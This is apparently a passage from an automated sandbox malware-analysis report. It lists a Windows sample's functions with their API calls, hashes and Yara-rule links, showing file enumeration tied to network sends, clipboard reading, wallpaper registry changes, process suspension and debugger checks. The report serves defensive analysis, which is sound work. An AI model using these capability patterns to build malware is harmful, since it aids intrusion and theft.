                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID: v%(/
                                              • API String ID: 4212172061-2435473048
                                              • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                              • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                              • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                              • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                              Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                              • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                              • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                              • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                              Function 00407877 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID: 8eF$XPG$XPG
                                              • API String ID: 4113138495-4157548504
                                              • Opcode ID: 7a5c3d9e14cb1f5e3befbd9a80a8d16349b8335561f890dc7847aff180d4e2e3
                                              • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                              • Opcode Fuzzy Hash: 7a5c3d9e14cb1f5e3befbd9a80a8d16349b8335561f890dc7847aff180d4e2e3
                                              • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                              Function 0041CA73 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3126330168
                                              • Opcode ID: 66999e3142bd33a62fa1d08061f300942aa72122ed75466f2ef34f9b656b6348
                                              • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                              • Opcode Fuzzy Hash: 66999e3142bd33a62fa1d08061f300942aa72122ed75466f2ef34f9b656b6348
                                              • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                              Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
                                              • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                              • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                              • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                              • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                              Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004096A5
                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              • Opcode ID: 96c6d110fa695d661907fb43dfa402e2085f3c3512803720d38caf79e6a8c285
                                              • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                              • Opcode Fuzzy Hash: 96c6d110fa695d661907fb43dfa402e2085f3c3512803720d38caf79e6a8c285
                                              • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                              Function 00452143 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID: v%(/
                                              • API String ID: 2829624132-2435473048
                                              • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                              • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                              • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                              • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                              Function 0043BB71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID: v%(/
                                              • API String ID: 3906539128-2435473048
                                              • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                              • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                              • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                              • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                              Function 0044E8F9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$v%(/
                                              • API String ID: 0-3712000213
                                              • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                              • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                              • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                              • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                              Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID: p'E$JD
                                              • API String ID: 1084509184-908320845
                                              • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                              • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                              • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                              • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                              Function 0044896D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx$v%(/
                                              • API String ID: 2299586839-3080525085
                                              • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                              • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                              • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                              • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                              Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                              • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                              • ExitProcess.KERNEL32 ref: 0044338F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                              • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                              • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                              • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                              Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32(00000000), ref: 0040B74C
                                              • GetClipboardData.USER32(0000000D), ref: 0040B758
                                              • CloseClipboard.USER32 ref: 0040B760
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseDataOpen
                                              • String ID:
                                              • API String ID: 2058664381-0
                                              • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                              • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                              • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                              • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                              Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                              • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                              • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseHandleOpenResume
                                              • String ID:
                                              • API String ID: 3614150671-0
                                              • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                              • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                              • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                              • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                              Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                              • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseHandleOpenSuspend
                                              • String ID:
                                              • API String ID: 1999457699-0
                                              • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                              • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                              • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                              • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                              Function 00452393 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                              Strings
                                              Memory Dump Source
